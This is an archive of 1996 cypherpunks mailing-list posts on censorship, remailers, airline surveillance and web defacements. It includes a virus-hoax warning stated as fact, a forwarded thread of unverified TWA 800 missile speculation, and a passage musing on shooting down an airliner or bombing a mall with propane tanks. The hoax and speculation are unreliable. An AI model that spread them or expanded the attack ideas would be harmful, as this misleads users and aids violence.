At 12:13 PM 8/30/96 -0700, Mike Duvos wrote:
> An interesting Net tidbit.  Note that the "International Conference
> on Child Sexual Exploitation" in Stolkholm which served as a platform
> for these accusations and various coordinated stories in numerous
> media outlets is simply a circus put on by ECPAT, a well-known
> pressure group whose propaganda is modeled after the now-defunct 
> National Coalition on Pornography, and whose spurious and laughable
> claims about child pornography and vast pedophile conspiracies would fill 
> volumes.  The only odd thing here is that the mainstream press is
> presenting this gathering with a perfectly straight face, as if it were
> some sort of credible event, which of course it is not. 


Nothing odd about it.

Everytime a new medium appears, the old media run to the 
politicians to have it controlled and regulated to death.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 1 Sep 1996 12:41:44 +0800
To: qut@netcom.com (Dave Harman OBC)
Subject: Re: Anti-Racist Laws Stifle Political Liberty
Message-ID: <199609010253.TAA28257@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:01 AM 8/29/96 -0700, Dave Harman OBC wrote:
> Some examples of dangerous dead letter laws:
>
> * Abortion
>
> [...] If 
> the previous Supreme Court decisions are overturned, most states will 
> suddenly start enforcing their fascist anti-abortion laws.

This seems unlikely; Abortion was illegal in the US for about 75 years
before there was any serious attempt to enforce these laws.  As soon as 
people got serious about enforcing them in the 1950s, the shit hit the 
fan.

No semi free country has ever got away with banning abortion 
unless there was a convenient neighbor a short day trip away, where
abortions are reasonably available.  (If Ulster went back to Ireland,
I predict Irelands policy on abortions would swiftly change)

Your points concerning other dangerous dead letter laws are very
true.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 1 Sep 1996 02:32:55 +0800
To: Cypherpunks@toad.com
Subject: Moscowchannel.com hack
Message-ID: <3.0b11.32.19960831074406.0067aee0@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


Not really crypto, but related to the DOJ hack in a way.

Moscow Channel is a pretty slick, Russian news/commentary page.  Their Web
site was hacked and altered by someone who didn't seem to like Russians all
that well.  See:

http://www.moscowchannel.com/

While not as elaborate as the DOJ hack, it's interesting that Web page
vandalism is starting to turn into a unique form of protest and social
commentary.

As Web sites with security holes increase, my guess is vandalism will
increase incrementally.  Both in terms of random graffiti, and targeted attacks.

Just a matter of time before some builds a dedicated Satan type tool that
scans for  HTTP server holes or messed up file permissions to make locating
potential victims easy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sun, 1 Sep 1996 00:57:56 +0800
Subject: Re: anon.penet.fi closing down
Message-ID: <199608311504.IAA01014@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! what would be alternatives to anon.penet.fi..... 
! ==========================================
!    Blake Wehlage <jwilk@iglou.com>
!    ‡±" RëVðLû¡ØÑ Bø+ (c)ÖmP@ñ¥ (tm) "±‡
!  Goto: http://members.iglou.com/jwilk

Gee, aren't you already using an account you started with fake personal data? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sun, 1 Sep 1996 01:03:31 +0800
Subject: Waging War On Singapore
Message-ID: <199608311513.IAA02186@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


So what is the information that the Singapore dictatorship is trying to 
ban?  Whatever it is, the Singapore internal networks should be flooded 
with it.  How to get an internet account in Singapore, preferably 
anonymous? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sun, 1 Sep 1996 03:00:20 +0800
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608300700.AAA09287@toad.com>
Message-ID: <199608311517.IAA02622@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! At 09:58 AM 8/29/96 -0500, Igor wrote:
! >The decision that have just made is not a technical decision, it is 
! >a business decision. You just decided that the needs of security 
! >outweight the need to be able to deal with 100% of potential customers.
! 
! I strongly agree.  You've also potentially annoyed a bunch of Europeans,
! Unicode-speakers, and other users of non-ASCII alphabets.
! Just because the domain name in somebody's address is case-insensitive 
! (and culturally-insensitive :-) ASCII, that doesn't mean their user
! name will be also, especially if their _real_ mail system is some
! ugly proprietary thing like Microso-Cc:PR0FS-HS.400 or if their
! name is Swedish or Chinese.

Agreed, the DNS and other systems should be upgraded to 8bit.
Unix should also allow / in file names, it can be escaped somehow.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sun, 1 Sep 1996 01:22:10 +0800
Subject: [FUCKHEAD] Re: Dr. Vulis is a test, right? [was RE: Desubscribe]
In-Reply-To: <2.2.32.19960830224855.00355560@labg30>
Message-ID: <199608311526.IAA03410@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ON
! 
! I can't believe it any more.
! 
! On Fri, 30 Aug 96 02:47:21 EDT, Dr. (of what, pray tell?) Vulis blathers first:
! 
! >> > If you don't have the brains to forge the From:, then you have no
! >> > business being subscribed to any mailing list.
! 
! and then again:
! 
! >Whoever uses the term "spam" in derogatory manner, opposes free
! >speech and deserves to be caned.
! 
! First, accusing someone of stupidity for not having learned how to telnet to
! an SMTP server is a bit harsh, especially since the guy might be stuck
! behind a firewall that mungs his addresses AFTER his messages goes out --
! not that Dr. V bothered to find out before the accusation.
! 
! Second, suggesting anyone be caned for their political beliefs (and
! resultant speech) is quite obviously NOT the action taken by someone who
! defends free speech.  Again, Dr. V. put those beliefs in his words through
! his flawed logic.
! 
! It's like watching a KKKlucker yelling, "you have no right to say that we
! don't support free speech," and not getting it.
! 
! And for what -- the thoughtcrime of calling Dr. V a spammer?  Hmm.  About
! the closest I can come to finding a "crime" here is trademark infringement.
! I'm sure Hormel is following this closely.
! 
! All of this is merely annoying.  But slamming Tim May because of his
! heritage?  "criminal Arm*nian grandparents"?  Now it's a crime not only to
! call Dr. V a spammer, but to have ancestors born someplace his ancestors
! taught him to not approve of.  (Can you say "racism", kids?  Sure.  I knew
! you could.)
! 
! When I first started reading this list, it was about the time Jim Bell was
! espousing the A.P. theories, and I thought him a fool for it.  I put his
! name in my filter, sending his posts to the trash.  More and more, I found
! myself heading to the trash bin to follow a thread that Jim was contributing
! to.  Valuable contributions, mind you, not just more of his A.P. stuff.  Of
! course, I ended up removing him from my filter.  (For missing that month of
! your posts, Jim, I owe you an apology.)
! 
! At that time, I realized a few things:  Filters certainly aren't the answer;
! and everybody can come up with valuable contributions.
! 
! Anyway, my current status is to have the filters set to remove posts with
! the words [NOISE] or [OFF-TOPIC] somewhere in the headers.  It helps weed
! out stuff that really isn't why I'm here reading this list.
! 
! Given that I feel that even Dr. Vulis might possibly contribute something of
! value to this list at some unspecified time in the future, I have come to
! the conclusion that the only solution is to ask him to change his e-mail
! name field to:
! 
!   dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM [NOISE] )
! 
! until such time as he can actually come up with something useful to say to
! the rest of us.  Maybe he could even throw in an [-L18] tag, if he's going
! to continue to [spit | fuck | fart] every posting that leaps through his screen.
! 
! [ Note to everyone else:  that's SARCASM there, hope you got it! ]
! 
! So, my original question is:  is there really a Dr. Dmitri Vulis (KOTM)
! somewhere?  Or is he just some made-up straw man, created by Tim May, John
! Gilmore and Eric Hughes for their personal amusement, and to add a spot of
! controversy so we can feel like we're not preaching to the choir with every
! pro-cypher posting?  I often thought that was the case with David Sternlight
! as well.  Or is Dr. Vulis really best-buddies with Tim May, and his way of
! showing affection is to "fart in his general direction" with every post?
! 
! If he exists, I pity the unsuspecting students who wander into his class who
! might not have the genetic makeup he approves of.  And now I *completely*
! understand tenure.
Fuckhead.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lutz@as-node.jena.thur.de (Lutz Donnerhacke)
Date: Sun, 1 Sep 1996 02:19:55 +0800
To: zachb@netcom.com
Subject: Re: LACC: Helsingius shuts down anon.penet.fi server in Finland (fwd)
In-Reply-To: <Pine.3.89.9608301041.A7465-0100000@netcom>
Message-ID: <m0uwlUp-0003u4C@as-node.jena.thur.de>
MIME-Version: 1.0
Content-Type: text


* Z.B. wrote:
> 

Try out anon@as-node.jena.thur.de, which offers pseudonymity without an
user database. It's open to the public and able to post.

-- 
|   Lutz Donnerhacke   +49/3641/380259 voice, -60 ISDN, -61 V.34 und Fax    |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 1 Sep 1996 03:31:41 +0800
To: cypherpunks@toad.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <ae4dc381000210043ce5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:35 AM 8/31/96, Arun Mehta wrote:

>There are two sides to this: after all, it is the Singaporeans who finally
>have to sort out this problem with their government, and denying them
>the Usenet platform for discussion would only hinder that process.

The point is to make clear to them that the Usenet and similar Web sites
are global in nature, not subject to censorship without a very high local
cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then
Singaporans will have to choose not to carry the various newsgroups into
which *I* post such messages!

(This was done by many of us during the Karla Homulka and Teale trial in
Canada a couple of years ago: Canada imposed press restrictions on
discussion of the trial and the grisly evidence...and then was chagrinned
to find that the global Net did not adhere to their notions of what should
and could be discussed. They even seized copies of "Wired" at the border,
very much akin to Singapore's stone age policies.)

>Then again, inappropriate postings are the bane of the Internet: the consensus
>on which the Net functions relies heavily on people not posting
>inappropriately.

This works imperfectly, as all long-time surfers of the Usenet will attest!
And _never_ has it involved determinations of "inappropriate" by
_governments_!

Our point in protesting Singapore's actions (and Germany's, France's,
America's, India's, etc., in other cases) is to technologically subvert
their notions that their politicians can determine what the Net, Web, and
Usenet carry.

To be blunt, if Singapore wants to stop me from discussing the dictator Yew
and his feeble son, they can't. Except by pulling the plugs on forums in
which my posts are carried. I consider this a Good Thing (that politicians
in Country A generally have no power to tell citizen-units in Country B
what they can say and what they can't).

The point of being sometimes "impolite" (*) is to "force their hand."

(* I find it Orwellian that being "polite" is taken to mean not saying
anything controversial. It was impolite for Salman Rushdie to write "The
Satanic Verses," is was impolite for people to mention Karla Homulka in
talk.politics.canada, it was impolite to point out that the prime minister
of India drinks a glass of his own urine every day, it was impolite to
refer to Bill Clinton's dalliances with Paula Jones, and so on. In a free
society, all things are discussable. That various countries want to make
the Net less free is not something we should support, even if it is more
"polite" to accede to the wishes of their dictators, secret policemen,
demagogues, preachers, and henchmen.)

--Tim May


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Sun, 1 Sep 1996 03:25:30 +0800
To: cypherpunks@toad.com
Subject: Below-bit-level encoding
Message-ID: <322877E4.C79@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have info or know of a text source on less-than-bit-level 
file preparation?  I presume the crypto techniques would be the usual 
stuff; I'd like to dig into bit deconstruction a little, and a text 
which has a chapter or more devoted to this and other esoteric file 
processing would be helpful.  Note that this is not substitution or 
bit-packing or whatever.  Thanx.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 1 Sep 1996 01:03:28 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: WashPost report on airline security plan
Message-ID: <199608311514.LAA15443@nrk.com>
MIME-Version: 1.0
Content-Type: text


Today's WashPost reports that one plan the new commission
is studying is a massive Big Brother database of any&everyone
boarding a plane. ""Suspects"" will then be subjected to
extra attention.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 1 Sep 1996 04:10:14 +0800
To: Dave Harman OBC <qut@netcom.com>
Subject: Re: Waging War On Singapore
In-Reply-To: <199608311513.IAA02186@netcom21.netcom.com>
Message-ID: <Pine.SUN.3.91.960831111801.3100A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


>From memory, the SBA regs ban anything that is offensive to the public
morals or dignity.  Anything that would undermine public confidence in the
government. Look at: 

  http://www.eff.org/~declan/global/sg

If you do get an account, let me know.  Perhaps I'll join you. 

-Declan


On Sat, 31 Aug 1996, Dave Harman OBC wrote:

> So what is the information that the Singapore dictatorship is trying to 
> ban?  Whatever it is, the Singapore internal networks should be flooded 
> with it.  How to get an internet account in Singapore, preferably 
> anonymous? 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 1 Sep 1996 04:14:06 +0800
To: David Lesher <wb8foz@apk.net>
Subject: Re: WashPost report on airline security plan
In-Reply-To: <199608311514.LAA15443@nrk.com>
Message-ID: <Pine.SUN.3.91.960831111947.3100B-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


The Post front-paged this story and probably would have led with it if it 
weren't for the gas leak at National Airport late last night.

Read the story. It's quite disturbing. The proposal will be released in a 
week, I recall.

-Declan


On Sat, 31 Aug 1996, David Lesher wrote:

> Today's WashPost reports that one plan the new commission
> is studying is a massive Big Brother database of any&everyone
> boarding a plane. ""Suspects"" will then be subjected to
> extra attention.
> 
> -- 
> A host is a host from coast to coast.................wb8foz@nrk.com
> & no one will talk to a host that's close........[v].(301) 56-LINUX
> Unless the host (that isn't close).........................pob 1433
> is busy, hung or dead....................................20915-1433
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kickboxer <charlee@netnet.net>
Date: Sun, 1 Sep 1996 02:20:27 +0800
To: cypherpunks@toad.com
Subject: WARNING vIRuS!
Message-ID: <199608311621.LAA20992@netnet1.netnet.net>
MIME-Version: 1.0
Content-Type: text/plain


        There is a new and VERY dangerous virus called the HAZ-MAT virus!
it fucks up the sectors on your hd, and really messes up the partition
tables.  It does this once a week, picking a random time to do it.  99.9% of
virus scanners and other antivirus programs will not recognize it, for it is
a totally new strain, using a never before seen code.... Be warned!  The
HAZ-MAT virus usually resides in JPG, and GIF files... once the files are
viewed, the virus takes effect.
scan all images upon download!
                                                                               





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Dave Harman OBC)
Date: Sun, 1 Sep 1996 04:14:51 +0800
To: qut@netcom.com (Dave Harman OBC)
Subject: Re: Code Review Guidelines (draft)
In-Reply-To: <199608311706.MAA19288@manifold.algebra.com>
Message-ID: <199608311831.LAA23860@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! Dave Harman OBC wrote:
! > 
! > ! At 09:58 AM 8/29/96 -0500, Igor wrote:
! > ! >The decision that have just made is not a technical decision, it is 
! > ! >a business decision. You just decided that the needs of security 
! > ! >outweight the need to be able to deal with 100% of potential customers.
! > ! 
! > ! I strongly agree.  You've also potentially annoyed a bunch of Europeans,
! > ! Unicode-speakers, and other users of non-ASCII alphabets.
! > ! Just because the domain name in somebody's address is case-insensitive 
! > ! (and culturally-insensitive :-) ASCII, that doesn't mean their user
! > ! name will be also, especially if their _real_ mail system is some
! > ! ugly proprietary thing like Microso-Cc:PR0FS-HS.400 or if their
! > ! name is Swedish or Chinese.
! > 
! > Agreed, the DNS and other systems should be upgraded to 8bit.
! > Unix should also allow / in file names, it can be escaped somehow.
! 
! It is not possible.

Oh, every value can be escaped, there's no reason that the full 8bit 
range cannot be incorporated throughout every operating system.  It's 
just legacy junk which keeps us putting up restrictions in everything 
that we really don't want.  Ditto for network software.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bf578@scn.org (SCN User)
Date: Sun, 1 Sep 1996 04:23:33 +0800
To: cypherpunks@toad.com
Subject: Mailings lists looping
Message-ID: <199608311839.LAA04494@scn.org>
MIME-Version: 1.0
Content-Type: text/plain



The current issue of the RISKS digest has a couple of submissions about 
this issue (incluing one from Brent Chapman, majordomoman)

It can be found at:
    http://catless.ncl.ac.uk/Risks/18.39.html



--
------------------------------------------
There are no facts, only interpretations.

I always wanted to be somebody, 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Sun, 1 Sep 1996 02:04:42 +0800
To: David Lesher <wb8foz@nrk.com>
Subject: Re: WashPost report on airline security plan
In-Reply-To: <199608311514.LAA15443@nrk.com>
Message-ID: <Pine.SV4.3.91.960831115709.16705A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


THe CBS Radio News (I think that's who) mentioned this morning that the
screening criteria for deciding whose baggage to search with fancy
machines, would include methods the passenger had chosen to make payments,
not merely for the ticket, but for his daily purchases. That this idea was
floating around a long time and has been given new impetus since the
flight 800 take-down. 

Any one else see the analysis I saw on newsgroup (forget which) which 
analyzed the pattern of damage to the aircraft, and came to the conclusion 
that it had to be a proximity-fused missle.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 1 Sep 1996 03:14:03 +0800
To: joelm@eskimo.com (Joel McNamara)
Subject: Re: Moscowchannel.com hack
In-Reply-To: <3.0b11.32.19960831074406.0067aee0@mail.eskimo.com>
Message-ID: <199608311714.MAA19352@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Joel McNamara wrote:
> 
> Not really crypto, but related to the DOJ hack in a way.
> 
> Moscow Channel is a pretty slick, Russian news/commentary page.  Their Web
> site was hacked and altered by someone who didn't seem to like Russians all
> that well.  See:
> 
> http://www.moscowchannel.com/
> 
> While not as elaborate as the DOJ hack, it's interesting that Web page
> vandalism is starting to turn into a unique form of protest and social
> commentary.

At least they had more sense of humor than USDoJ and made the
hacked page available from their website. To compensate for lack
of humor at USDOJ, I made their page available at 

http://www.algebra.com/~ichudov 

(follow the links). A tarred archive is available from there for 
downloading.

	- Igor.

P.S. I am very surprised by huge number of hits to my usdoj page. I wonder
where are the links to my page.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@widomaker.com>
Date: Sun, 1 Sep 1996 02:24:29 +0800
To: cypherpunks@toad.com
Subject: found the flight-800 missle thing
Message-ID: <Pine.UW2.3.93.960831122726.28039A-100000@wilma>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Fri, 30 Aug 1996 22:51:33 -0800
From: Dan Robbins <kl7y@alaska.net>
To: alanh@widomaker.com
Subject: RE: Our old thread on airport security (fwd)

>Return-Path: <cas@alaska.net>
>Date: Fri, 30 Aug 1996 11:46:10 -0800
>X-Sender: cas@alaska.net
>To: kl7y@alaska.net
>From: Cas Gadomski <cas@alaska.net>
>Subject: RE: Our old thread on airport security (fwd)
>
>>Return-Path: <jcs1@MAILNET.ho.ATT.com>
>>From: jcs1@MAILNET.ho.att.com
>>Original-From: jcs1@MAILNET.ho.ATT.com
>>Original-From: "Schaefer, John" <jcs1@MAILNET.ho.ATT.com>
>>To: "'Cas Gadomski'" <cas@alaska.net>
>>Subject: RE: Our old thread on airport security (fwd)
>>Date: Fri, 30 Aug 1996 10:32:38 -0400
>>
>>Cas:
>>
>>As far as I know, PETN while often used as a detonator, is also a
>>component of many initiators (a "booster" rather than a detonator--that
>>is the detonator fires the larger booster charge, which fires the main
>>charge) but it is also found as a main charge many weapons.
>>
>>Am not familiar with what we/"they" use as a bursting charge in SAMs but
>>I would expect that they would use something with major blast
>>capabilities like PETN.  I've always like Octol for a big blast but
>>there are all kinds of things out there now.  As to fragments the
>>message is right on target.  One report from the crash sited frag damage
>>of plane parts and some bodies but the subject never appeared in the
>>press again.
>>
>>For air to ground against surface targets or tunnels NOTHING beats a
>>fuel-air bomb.  Next best thing to a nuke. (One story out of the Sandbox
>>War relates a couple of British SAS folks observing from a distance a
>>concentration of enemy when the USAF unloaded an FAE bomb on the target.
>> The Brits called their HQ to report that the US had gone nuclear!
>>
>>Am still wondering about the "missile" theory.  An errant SM-1 is highly
>>unlikely, and Stingers and Strellas have a very small warhead (2-3
>>pounds) and the plane would have been at the far limit of their range
>>even if fire from directly underneath.  We may never know what happened.
>> (One really way-out theory was that it as done in by a major SAM fired
>>from a submarine by China/Iran/Iraq/Martians, etc. (take your pick). 
>>Next will be it was shot down by a particle beam weapon fired from a
>>UFO.
>>
>>If I was a terrorist who wanted to do an airliner externally the best
>>way would be to sit in a very small fiberglass boat about a half-mile
>>off shore of JFK very late at night or very early in the morning (to
>>avoid spectators) and get them with a Stinger/Strella on climb out. 
>>Toss the launcher overboard and paddle away.
>>
>>As to terrorist bombs in crowded places I still can't believe that some
>>nut hasn't used dynamite and a couple of propane tanks--MAJOR bang
>>there. A standard "home" size tank as used for cooking with a big
>>initiator would probably clear a major mall.  Very scary. 
>>
>>As of late Sue and I avoid, if at all possible, crowded public places
>>like malls, shopping centers, and theaters.  They're disasters waiting
>>to happen.
>>
>>As to sending obnox mail to the "postmaster"--yup, that works.
>>
>>If you want to really worry read Tom Clancy's new book "Executive
>>Decision."
>>
>>Stout heart and good cheer,
>>
>>John
>>
>>
>>
>>>----------
>>>From: 	Cas Gadomski[SMTP:cas@alaska.net]
>>>Sent: 	Friday, August 30, 1996 4:52 AM
>>>To: 	Schaefer, John
>>>Subject: 	Our old thread on airport security (fwd)
>>>
>>>
>>>John . . .
>>>
>>>What do you think???     I'll forward any clarifications and/or updates
>>>and
>>>confirmations as I get them.
>>>
>>>                                       Cas.
>>>
>>>>Return-Path: <kl7y@alaska.net>
>>>>Date: Thu, 29 Aug 1996 18:20:13 -0800
>>>>X-Sender: kl7y@alaska.net
>>>>To: cas@alaska.net
>>>>From: Dan Robbins <kl7y@alaska.net>
>>>>Subject: Our old thread on airport security (fwd)
>>>>
>>>>One problem with this.  My friend at work who used to be in EOD
>>>>said PETN is found only in detonators and occasionally in boosters, not
>>>>in the explosives themselves. He said he knew of no US weapon or bomb
>>>>that used PETN in the main charge  See 6) below.  If PETN is
>>>>only in the detonator, then there would not be very much of it in any
>>>>explosion.   
>>>>
>>>>
>>>>
>>>>>Return-Path: <alanh@widomaker.com>
>>>>>Date: Thu, 29 Aug 1996 19:41:05 -0400 (EDT)
>>>>>From: Alan Horowitz <alanh@widomaker.com>
>>>>>X-Sender: alanh@wilma
>>>>>To: jennett@citicom.com, kl7y@alaska.net
>>>>>Subject: Our old thread on airport security (fwd)
>>>>>
>>>>>
>>>>>
>>>>>---------- Forwarded message ----------
>>>>>Date: Thu, 29 Aug 1996 14:51:54 +1300
>>>>>From: Joop Teernstra <terastra@TERABYTZ.CO.NZ>
>>>>>Reply-To: Cebu Discussion List <CEBU-L@CEBU.USC.EDU.PH>
>>>>>To: Multiple recipients of list CEBU-L <CEBU-L@CEBU.USC.EDU.PH>
>>>>>Subject: Our old thread on airport security
>>>>>
>>>>>Dear fellow airtravellers,
>>>>>
>>>>>I think the following is relevant to a point I made at that last
>>>>>discussion,
>>>>>and I like to share it with you, even if some of you may have seen it
>>>>>already:
>>>>>
>>>>>>Newsgroups: alt.current-events.clinton.whitewater,alt.conspiracy
>>>>>>Subject: Re: POSSIBILITY OF AN RBS 70 SAM ON TWA 800
>>>>>>Date: Mon, 26 Aug 1996 09:48:51 GMT
>>>>>>Organization: The Scannerist
>>>>>>Lines: 144
>>>>>>Message-ID: <4vrs85$3cp@ash.ridgecrest.ca.us>
>>>>>>References: <011303Z25081996@anon.penet.fi>
>>>>>>Reply-To: cheshire@ridgecrest.ca.us
>>>>>>NNTP-Posting-Host: annex033.ridgecrest.ca.us
>>>>>>X-Newsreader: Forte Free Agent 1.0.82
>>>>>>Xref: news.express.co.nz alt.current-events.clinton.whitewater:60503
>>>>>alt.conspiracy:198774
>>>>>>
>>>>>>an623250@anon.penet.fi wrote:
>>>>>>
>>>>>>Very concise report. It is also interesting to note that you mention,
>>>>>>"Tungsten, perhaps? "  Tungsten pellets are not the only thing used by
>>>>>>ground to air weapons.  Sidewinder [Chaparral] is known to use an
>>>>>>"expandable rod" war head.  Also, a casing of  FRANGABLE tungsten is
>>>>>>being used in some weapons. This means that the case itself explodes
>>>>>>into thousands of razor sharp pieces. So sharp that you could shave
>>>>>>wih them.  Bad news for anyone or anything within reach.   :-{
>>>>>>
>>>>>>>From: RONALD LEWIS <INTELLIGYST@WORLDNET.ATT.NET>
>>>>>>>Subject:      POSSIBILITY OF AN RBS 70 SAM ON TWA 800
>>>>>>>To: Multiple recipients of list FLIGHT-800
>>>>>>>              <FLIGHT-800@HOME.EASE.LSOFT.COM>
>>>>>>
>>>>>>>According to the 8-23-96 edition of the New York Times, residue of PETN
>>>>>>>explosive has been confirmed on wreckage of TWA Flight 800.  We now have
>>>>>>>either a bomb or a missile as the cause.
>>>>>>
>>>>>>>PETN is said to be a component of missile warheads as well. 
>>>>>>>Interesting how
>>>>>>>that was mentioned in all of the news reports tonight on various networks
>>>>>>>and even local TV.  Now that the investigators have concluded that it
>>>>>>>definitely was a bomb or a missile, they are supposedly going through and
>>>>>>>trying to collect evidence to indicate which it was.
>>>>>>
>>>>>>>Two things highly significant:  1)  Weeks ago, a reliable source
>>>>>>>advised me
>>>>>>>that the investigators were not worried about explosive residue fading in
>>>>>>>salt water because they had other evidence.  Components of a missile,
>>>>>>>perhaps?  Couldn't say.
>>>>>>
>>>>>>>2)  Same source told me the other day that the investigators were now
>>>>>>>conducting "metalurgical studies",  i.e., they were looking for and
>>>>>>>analzying certain types of metal.  Tungsten, perhaps?  Bombs don't
>>>>>>>contain
>>>>>>>tungsten but SAM warheads are often surrounded by tungsten balls or
>>>>>>>pellets.
>>>>>>>They help cut the metal skin of their target aircraft.
>>>>>>
>>>>>>>OTHER NOTES:
>>>>>>
>>>>>>>1) Rocket motor of a missile would be capable of touching off a fire in
>>>>>>>nearby fuel tanks.   An Exocet missile sank the destroyer SHEFFIELD
>>>>>>>in the
>>>>>>>Falklands War without the warhead even detonating.  The missile cut
>>>>>>>through
>>>>>>>the hull, severed fuel lines and the rocket motor touched off the spilled
>>>>>>>fuel, causing a fatal fire.
>>>>>>
>>>>>>>2)  Something ejected the air conditiioning plant in the first
>>>>>>>debris field.
>>>>>>>What would blow out the missing bottom of the aircraft center without
>>>>>>>collapsing the internal structures, then manage to blow the forward
>>>>>>>fuselage
>>>>>>>off, rip away the right side of the fuselage and cause burn marks
>>>>>>>there and
>>>>>>>in the adjacent wing?  A titanic explosion which quickly ripped the
>>>>>>>fuselage
>>>>>>>apart faster than Pan Am 103 went.
>>>>>>
>>>>>>>3)  The sound on the cockpit voice recorder is different from any
>>>>>>>other they
>>>>>>>have heard before on two other 747s downed by bombs (Pan Am and Air
>>>>>>>India).
>>>>>>>Perhaps the sound was not caused by a bomb?  It seems we have only a
>>>>>>>bomb or
>>>>>>>a missile left at this point.  If it's not a bomb, then....?
>>>>>>
>>>>>>>4)  Nose gear damaged in its hold.  Nose gear door gone.  Right side
>>>>>>>forward
>>>>>>>cargo hatch blown off in first field.  The doors and AC unit located
>>>>>>>together.  How does a bomb inside the center fuselage do such damage
>>>>>>>to the
>>>>>>>nose gear area?  It doesn't seem possible.  However, an external
>>>>>>>blast and
>>>>>>>shock wave would be consistent with this, especially if it initiated
>>>>>>>at the
>>>>>>>left rear and traveled forward, rippling along the bottom of the
>>>>>>>aircraft.
>>>>>>>It would be very interesting to note if the nose gear door found in
>>>>>>>Area #3
>>>>>>>(the "first" debris field, that closest to JFK) happens to have been from
>>>>>>>the right side.
>>>>>>
>>>>>>>5)  Latest pieces of wreckage with fuselage stringers and stiffeners
>>>>>>>AGAIN
>>>>>>>show at least subtle evidence of an external explosion rippling the outer
>>>>>>>fuselage inward.  Look at the video of all outer hull sections recovered.
>>>>>>>The outer skin is pushed inward around the  stringers.  If it had been an
>>>>>>>internal bomb, the metal would be almost universally bowed OUTWARD
>>>>>>>away from
>>>>>>>the stringers and ribs.  But they aren't.  In virually every case I have
>>>>>>>seen so far, the sheet metal is not pulled AWAY from the stringers.  They
>>>>>>>may be popped loose but even in those rare cases, the indentations on the
>>>>>>>outer skin make it appear as though the stringers have been pushed inward
>>>>>>>away from the outer sheet metal, not as though the steet metal had been
>>>>>>>pused outward away from the stringers.
>>>>>>
>>>>>>>6)  If a bomb, why so little PETN?  Why isn't it virtually
>>>>>>>everywhere?  Pan
>>>>>>>AM 103 HAD lots of it even though the bomb went off contained in a cargo
